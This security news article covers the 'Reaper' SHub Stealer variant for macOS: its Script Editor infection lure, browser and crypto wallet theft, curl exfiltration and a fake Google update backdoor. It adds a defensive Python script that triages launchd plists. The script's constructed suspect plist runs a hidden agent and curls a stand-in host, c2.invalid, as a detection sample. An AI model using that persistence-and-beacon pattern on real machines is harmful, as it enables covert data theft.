New SHub Stealer Variant 'Reaper' Automates macOS Infections, Targets Browsers and Crypto Wallets
A sophisticated new variant of the SHub Stealer malware, dubbed 'Reaper,' is targeting macOS users by automating infection through fake software websites and script editors, aiming to steal browser credentials and cryptocurrency.

A dangerous new variant of the SHub Stealer malware has emerged, targeting Mac users with advanced techniques designed for stealth and efficiency. Dubbed 'Reaper,' this updated build spreads through deceptive websites that impersonate popular software, luring unsuspecting users into downloading malicious payloads. Once executed, Reaper can silently exfiltrate sensitive data, including browser credentials and cryptocurrency from digital wallets, often before the victim realizes their system has been compromised.
What sets Reaper apart is its automated infection vector. Unlike previous macOS malware that might require users to manually copy and paste commands into the Terminal, Reaper leverages a fake webpage to silently open the Mac's Script Editor. This editor is pre-loaded with malicious code, and a single click from the user is sufficient to initiate the infection process. This 'ClickFix' technique, as identified by Moonlock researchers, represents a growing trend among macOS threat actors who are adopting and refining proven tactics from one another.
The campaign goes to significant lengths to appear legitimate. Attackers spoof well-known brands and host their malware on domains that closely mimic authentic ones. They often disguise malware downloads as critical security updates from Apple or use fake Google Software Update pathways to establish persistent backdoors. This high degree of deception allows the malware to bypass user suspicion and embed itself deeply within the victim's system, leading to a multi-stage attack that can result in stolen data, drained financial accounts, and a compromised system under remote attacker control.
Reaper represents a substantial upgrade over earlier SHub Stealer versions. While previous iterations could already pilfer browser data, macOS Keychains, iCloud account information, and Telegram session data, the new variant expands its reach significantly. It now actively targets a wide array of browsers, including Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion, along with their associated extensions. This broad targeting ensures a larger potential victim pool.
The malware's approach to cryptocurrency theft is particularly concerning. Instead of deploying fake wallet applications, Reaper directly modifies the code of legitimate desktop wallet software already installed on the victim's Mac. This allows it to surreptitiously siphon funds from targeted wallets such as Exodus, Atomic, Ledger Live, Electrum, and Trezor Suite. Additionally, Reaper incorporates an AMOS-style Filegrabber module designed to scan Desktop and Documents folders for valuable files in formats like .docx, .wallet, .key, .csv, .xls, and .json.
Upon successfully gathering stolen data, Reaper bundles it and uses the legitimate curl command to exfiltrate the information to an attacker-controlled server. To ensure persistence, it installs a backdoor disguised as a Google update service, allowing it to survive system reboots and remain hidden from detection. This sophisticated combination of social engineering, automated execution, broad targeting, and stealthy persistence makes SHub Reaper a formidable threat to macOS users.
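The persistence described above, a launchd job dressed up as a Google update service that shells out to curl, can be triaged from the plists in the LaunchAgents and LaunchDaemons folders. The script below is an added example written for this article, not Moonlock's tooling or anything from the Reaper sample; the "legitimate Google updater" path prefixes, the sample plists and the host c2.invalid are assumptions constructed for illustration.

```python
import plistlib
from pathlib import Path

# Assumption (not from the article): Google's genuine updater lives under these
# prefixes; a launchd job that calls itself "google" but runs from anywhere else
# matches the disguised backdoor the article describes.
def legit_google_prefixes(home):
    return ("/Library/Google/", f"{home}/Library/Google/")

SCRATCH_PREFIXES = ("/tmp/", "/private/tmp/", "/var/folders/", "/private/var/folders/")

def mentions_curl(args):
    """True if any argument (or any word inside a 'sh -c' string) is curl."""
    return any(tok.split("/")[-1] == "curl" for a in args for tok in a.split())

def triage_launchd_plist(raw, home="/Users/victim"):
    """Return a list of findings for one launchd plist; empty means nothing matched."""
    try:
        data = plistlib.loads(raw)
    except Exception as exc:            # a plist that will not parse is itself odd
        return [f"unparseable plist: {exc}"]
    label = str(data.get("Label", "")).lower()
    args = [str(a) for a in data.get("ProgramArguments", [])]
    program = str(data.get("Program") or (args[0] if args else ""))
    findings = []
    if "google" in label and not program.startswith(legit_google_prefixes(home)):
        findings.append(f"label {label!r} claims a Google service but runs {program!r}")
    if any(a.startswith(SCRATCH_PREFIXES) or "/." in a for a in [program, *args]):
        findings.append("program or arguments reference a temporary or hidden path")
    if mentions_curl(args):
        findings.append("job invokes curl directly (possible exfiltration or beacon)")
    if findings and (data.get("RunAtLoad") or data.get("KeepAlive")):
        findings.append("persists across reboots (RunAtLoad/KeepAlive set)")
    return findings

def scan_launch_dirs(home=str(Path.home())):
    """Triage every plist in the usual launchd directories; returns {path: findings}."""
    dirs = [Path(home) / "Library/LaunchAgents", Path("/Library/LaunchAgents"),
            Path("/Library/LaunchDaemons")]
    report = {}
    for d in dirs:
        for p in (d.glob("*.plist") if d.is_dir() else []):
            hits = triage_launchd_plist(p.read_bytes(), home)
            if hits:
                report[str(p)] = hits
    return report

# Constructed samples (not real indicators): a Keystone-style benign job and a
# disguised job of the shape the article describes.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>Label</key><string>com.google.keystone.agent</string>
<key>ProgramArguments</key><array><string>/Users/victim/Library/Google/GoogleSoftwareUpdate/agent</string></array>
<key>RunAtLoad</key><true/></dict></plist>"""
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict><key>Label</key><string>com.google.update.service</string>
<key>ProgramArguments</key><array><string>/bin/sh</string><string>-c</string>
<string>/Users/victim/.gupdate/agent; curl -s https://c2.invalid/up</string></array>
<key>RunAtLoad</key><true/><key>KeepAlive</key><true/></dict></plist>"""
```

Running `scan_launch_dirs()` on a Mac walks the real launchd folders; the two embedded samples show what a clean Keystone job and a disguised one look like to the checks.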
Protection against Reaper hinges on user vigilance and security best practices. Users should be extremely wary of any webpage that prompts them to open their Script Editor or Terminal and execute code. Closing such windows immediately is crucial. Furthermore, users should never enter their system password in response to a pop-up that appears immediately after installing new software, as this is a common indicator of malicious activity. For cryptocurrency holders, moving funds to offline cold wallets or dedicated hardware is strongly recommended. Maintaining up-to-date operating systems and security software provides an essential layer of defense against emerging malware variants.